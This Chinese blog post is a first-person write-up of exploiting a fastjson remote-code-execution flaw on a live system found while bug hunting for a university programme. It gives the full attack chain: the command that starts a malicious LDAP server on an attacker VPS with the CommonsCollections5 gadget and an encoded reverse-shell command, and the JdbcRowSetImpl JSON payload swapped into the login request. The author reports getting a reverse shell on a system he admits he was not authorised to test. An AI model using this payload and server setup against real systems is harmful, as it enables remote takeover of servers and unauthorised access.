您的位置 首页 网络安全

记一次fastjsonRCE实战

2021.2.4 今天edusrc突然出了浙大的证书,本来想挖一个浙大中危,不仅挖了4个全重复了,还打偏了一个…

2021.2.4

今天edusrc突然出了浙大的证书,本来想挖一个浙大中危,不仅挖了4个全重复了,还打偏了一个,故有了这篇文章。

在c段下看到这样一个系统

随便输个弱口令抓包看看

既然是json请求

这让我想起了fastjson爆出的RCE漏洞,于是利用了一下bp插件FastjsonScan 发现确实存在此漏洞

随之,我试了3、4个github上的工具,没有一个成功的,想ping个dnslog都没成功,但是payload发送响应包却没有问题,我一度怀疑难道是不出网??

于是把站点发给了有经验的朋友看了一看,他也复现了半天没有出来,后来在翻阅资料以及不同环境的对比之下,突然发现怎么用的这几个工具,每个工具自动利用的gadget都不同???

这也导致了 复现的失败,所以逼不得已,选择了手动选择gadget,尝试到了第五个CommonsCollections5,服务器终于有了反应。

(朋友的图)

于是我们重新开始,按照此工具的说明

https://github.com/wyzxxz/fastjson_rce_tool

在VPS上运行

java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099 CommonsCollections5 “编码过后的反弹shell语句”

编码地址:

http://www.jackson-t.ca/runtime-exec-payloads.html

Payload:

{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”ldap://VPS:1099/Object”,”autoCommit”:true}

burp用payload把登录json数据替换掉

反弹shell 成功

未授权,遂到此停止。

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/82/
考研勇士 LiAoRJ

作者: 考研勇士

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...

评论列表(2)

联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部